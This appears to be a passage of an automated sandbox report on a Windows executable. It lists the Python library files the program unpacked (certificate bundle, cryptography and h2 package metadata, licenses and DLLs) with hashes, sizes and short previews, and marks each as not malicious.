                                                                                                                                                                                                                                                                              Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                                                                                              Entropy (8bit):4.8208567868970675
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:Y0fK74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFuCQAAZWQcX6g8H4a81:gFCk2z1/t12iwU5usJFKCyHcqgg
                                                                                                                                                                                                                                                                              MD5:CBF62E25E6E036D3AB1946DBAFF114C1
                                                                                                                                                                                                                                                                              SHA1:B35F91EAF4627311B56707EF12E05D6D435A4248
                                                                                                                                                                                                                                                                              SHA-256:06032E64E1561251EA3035112785F43945B1E959A9BF586C35C9EA1C59585C37
                                                                                                                                                                                                                                                                              SHA-512:04B694D0AE99D5786FA19F03C5B4DD8124C4F9144CFE7CA250B48A3C0DE0883E06A6319351AE93EA95B55BBBFA69525A91E9407478E40AD62951F1D63D45FF18
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................X......o..............o.......o.......o......j..............n......n......n4.....n......Rich....................PE..d....#.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):121344
                                                                                                                                                                                                                                                                              Entropy (8bit):5.899699901799497
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:3Ives1m094QtwqlaZTwuQMS/Pf+vGTVmEU:3PsQIJmE
                                                                                                                                                                                                                                                                              MD5:BAC273806F46CFFB94A84D7B4CED6027
                                                                                                                                                                                                                                                                              SHA1:773FBC0435196C8123EE89B0A2FC4D44241FF063
                                                                                                                                                                                                                                                                              SHA-256:1D9ABA3FF1156EA1FBE10B8AA201D4565AE6022DAF2117390D1D8197B80BB70B
                                                                                                                                                                                                                                                                              SHA-512:EAEC1F072C2C0BC439AC7B4E3AEA6E75C07BD4CD2D653BE8500BBFFE371FBFE045227DAEAD653C162D972CCAADFF18AC7DA4D366D1200618B0291D76E18B125C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........yB............................................................................................Rich...........................PE..d....#.g.........." ...).2..........@4.......................................0............`.............................................d...d...................p............ ......@...................................@............P...............................text...x0.......2.................. ..`.rdata...Y...P...Z...6..............@..@.data....=.......0..................@....pdata..p...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:pip.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\METADATA

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):5724
                                                                                                                                                                                                                                                                              Entropy (8bit):5.120429897887076
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:DlkQIUQIhQIKQILbQIRIaMPktjaVMxsxA2ncEvGDfe0HEdwGArNZG0JQTQCQx5Kw:dcPuPwsrcEvGDfe0HENA5w0JQTQ9x59H
                                                                                                                                                                                                                                                                              MD5:526D9AC9D8150602EC9ED8B9F4DE7102
                                                                                                                                                                                                                                                                              SHA1:DBA2CB32C21C4B0F575E77BBCDD4FA468056F5E3
                                                                                                                                                                                                                                                                              SHA-256:D95F491ED418DC302DB03804DAF9335CE21B2DF4704587E6851EF03E1F84D895
                                                                                                                                                                                                                                                                              SHA-512:FB13A2F6B64CB7E380A69424D484FC9B8758FA316A7A155FF062BFDACDCA8F2C5D2A03898CD099688B1C16A5A0EDCECFC42BF0D4D330926B10C3FCE9F5238643
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.3.Name: cryptography.Version: 44.0.0.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\RECORD

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16286
                                                                                                                                                                                                                                                                              Entropy (8bit):5.5834828293766785
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:hXy1GL/l45jEVeKUZVhXau4WJU6F6Gotqw+Iq+NX6ih5VfUqb8q:hXPlMEVdcaiJU6F6Gotqw+/+96ih18q
                                                                                                                                                                                                                                                                              MD5:2496DE2174F8C9A02A970CE99AD11C1D
                                                                                                                                                                                                                                                                              SHA1:ED8C5FA701B40E21D4EE61F83412208551170413
                                                                                                                                                                                                                                                                              SHA-256:B118C21B2F7685A5866671188418B0F788DC06FFD491DBC3B402D7C49652604E
                                                                                                                                                                                                                                                                              SHA-512:6D8A4FC895A8CB3ED088E6C910B3E1BB132B4DCA140DE354EF48C98EBF626E6D6BF29CE39342651D69010A2CB4A2135B2375DFDF162835B900011ADB092FD5E9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-311.pyc,,..cryptography/__pycache__/__init__.cpython-311.pyc,,..cryptography/__pycache__/exceptions.cpython-311.pyc,,..cryptography/__pycache__/fernet

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\WHEEL

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):94
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0373614967294325
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
                                                                                                                                                                                                                                                                              MD5:A868F93FCF51C4F1C25658D54F994349
                                                                                                                                                                                                                                                                              SHA1:535C88A10911673DEABB7889D365E81729E483A6
                                                                                                                                                                                                                                                                              SHA-256:1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
                                                                                                                                                                                                                                                                              SHA-512:EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses\LICENSE

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):197
                                                                                                                                                                                                                                                                              Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                                                              MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                                              SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                                              SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                                              SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses\LICENSE.APACHE

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11360
                                                                                                                                                                                                                                                                              Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                                                              MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                                                              SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                                                              SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                                                              SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses\LICENSE.BSD

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1532
                                                                                                                                                                                                                                                                              Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                                                              MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                                                              SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                                                              SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                                                              SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):8292864
                                                                                                                                                                                                                                                                              Entropy (8bit):6.493076254122072
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:98304:Y4sf3zg+qUuQdPJMqYLSxuBLZqwt0kDO+5+O:cdeqYLSxuBLZrGjq+
                                                                                                                                                                                                                                                                              MD5:34293B976DA366D83C12D8EE05DE7B03
                                                                                                                                                                                                                                                                              SHA1:82B8EB434C26FCC3A5D9673C9B93663C0FF9BF15
                                                                                                                                                                                                                                                                              SHA-256:A2285C3F2F7E63BA8A17AB5D0A302740E6ADF7E608E0707A7737C1EC3BD8CECC
                                                                                                                                                                                                                                                                              SHA-512:0807EC7515186F0A989BB667150A84FF3BEBCC248625597BA0BE3C6F07AD60D70CF8A3F65191436EC16042F446D4248BF92FCD02212E459405948DB10F078B8E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.j...j...j....F..j.......j.......j.......j.......j.......j.......j...j...h.......i...j...j.......j.......j..Rich.j..........................PE..d....^Gg.........." ...*.R\..n"......~Z.......................................~...........`...........................................x.X.....x...............y...............~.......o.T.....................o.(...p.o.@............p\.8............................text....Q\......R\................. ..`.rdata..P9...p\..:...V\.............@..@.data... >....x.......x.............@....pdata........y.......y.............@..@.reloc........~.......}.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:pip.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\LICENSE

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1102
                                                                                                                                                                                                                                                                              Entropy (8bit):5.120351253767657
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:bOLRrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:bOLRaJHlxE35QHOs5exm3ogF5n
                                                                                                                                                                                                                                                                              MD5:AA3B9B4395563DD427BE5F022EC321C1
                                                                                                                                                                                                                                                                              SHA1:80129BCE9030CF215FC93006DCE98B0BA8C778F8
                                                                                                                                                                                                                                                                              SHA-256:7A65A5AF0CBABF1C16251C7C6B2B7CB46D16A7222E79975B9B61FCD66A2E3F28
                                                                                                                                                                                                                                                                              SHA-512:62337AD684E4AA1192DBA00503EED316F28F6480ACEA90442774BE544C970C3F9012933B451C036DB3AC388C495153D6C9FA04E1844E0A483E8E767218B90690
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:The MIT License (MIT)..Copyright (c) 2015-2020 Cory Benfield and contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\METADATA

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3583
                                                                                                                                                                                                                                                                              Entropy (8bit):4.978673419311688
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:D7evWamPktjxsxMMrgfHcxfS+UvWQH46o1WvUXCR:+RsMCgfGfS+UvW63MyR
                                                                                                                                                                                                                                                                              MD5:566784A778E8B69F205F14DAC1D57817
                                                                                                                                                                                                                                                                              SHA1:B1B850F3D43CC453086BED7034675426F81C9BDE
                                                                                                                                                                                                                                                                              SHA-256:C504EAA29585F6BDD95644FEC420C7016599401DE0FF3CAA80AC429748A847A4
                                                                                                                                                                                                                                                                              SHA-512:CFD127A2868E94E5F4FAFAB78A3153094D45F6538AE77642ADE9FABC5580D47DA2EC40A2EB7BF11FD6F5A21553A4489F5278B76AC017D738B64C4C9579B38D55
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: h2.Version: 4.1.0.Summary: HTTP/2 State-Machine based protocol implementation.Home-page: https://github.com/python-hyper/h2.Author: Cory Benfield.Author-email: cory@lukasa.co.uk.License: MIT License.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Requires-Python: >=3.6.1.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: hyperframe (<7,>=6.0).

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\RECORD

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                                                                                                                              Entropy (8bit):5.821419256958962
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:pnuXipSpe7lLCDHpks2hT429PTW/2B7V0Wh85dGlLt4qYt29tw:sXEFgH6hT42VTW/2tV0MmdGlLtnY89m
                                                                                                                                                                                                                                                                              MD5:60608F300F680A44E19E60188CFB1274
                                                                                                                                                                                                                                                                              SHA1:56CFF7648824FCFAC20DE09BF76A8D4CBD32A42A
                                                                                                                                                                                                                                                                              SHA-256:A38FC50F66CFA01BED1E2D81F6778ECE33FAF9729E12381B31DCAB8AB1C6A26B
                                                                                                                                                                                                                                                                              SHA-512:C7DF7F333243F3B868160B814ACF04C4CC1CEC772E62B06282DD8E24AC873DAD569F4456A2D003D8F1BEC9AE74875C725E3910F62BF2B61101D86029C4E36BAB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:h2-4.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..h2-4.1.0.dist-info/LICENSE,sha256=emWlrwy6vxwWJRx8ayt8tG0WpyIueZdbm2H81mouPyg,1102..h2-4.1.0.dist-info/METADATA,sha256=xQTqopWF9r3ZVkT-xCDHAWWZQB3g_zyqgKxCl0ioR6Q,3583..h2-4.1.0.dist-info/RECORD,,..h2-4.1.0.dist-info/WHEEL,sha256=OqRkF0eY5GHssMorFjlbTIq072vpHpF60fIQA6lS9xA,92..h2-4.1.0.dist-info/top_level.txt,sha256=Hiulx8KxI2jFUM1dG7-CZeRkO3j50MBwCLG36Vrq-kI,3..h2/__init__.py,sha256=inV-bCAUhD_QGjQe5Mk8gl7F85v26UW9W3BHov9vBAA,86..h2/__pycache__/__init__.cpython-311.pyc,,..h2/__pycache__/config.cpython-311.pyc,,..h2/__pycache__/connection.cpython-311.pyc,,..h2/__pycache__/errors.cpython-311.pyc,,..h2/__pycache__/events.cpython-311.pyc,,..h2/__pycache__/exceptions.cpython-311.pyc,,..h2/__pycache__/frame_buffer.cpython-311.pyc,,..h2/__pycache__/settings.cpython-311.pyc,,..h2/__pycache__/stream.cpython-311.pyc,,..h2/__pycache__/utilities.cpython-311.pyc,,..h2/__pycache__/windows.cpython-311.pyc,,..h2/config

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info\WHEEL

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                                                                              Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViHoKKjP+tPCCfA5S:RtBMwlViQWBBf
                                                                                                                                                                                                                                                                              MD5:11AA48DBE7E7CC631B11DD66DC493AEB
                                                                                                                                                                                                                                                                              SHA1:249FDB01AD3E3F71356E33E1897D06F23CFB20C2
                                                                                                                                                                                                                                                                              SHA-256:3AA464174798E461ECB0CA2B16395B4C8AB4EF6BE91E917AD1F21003A952F710
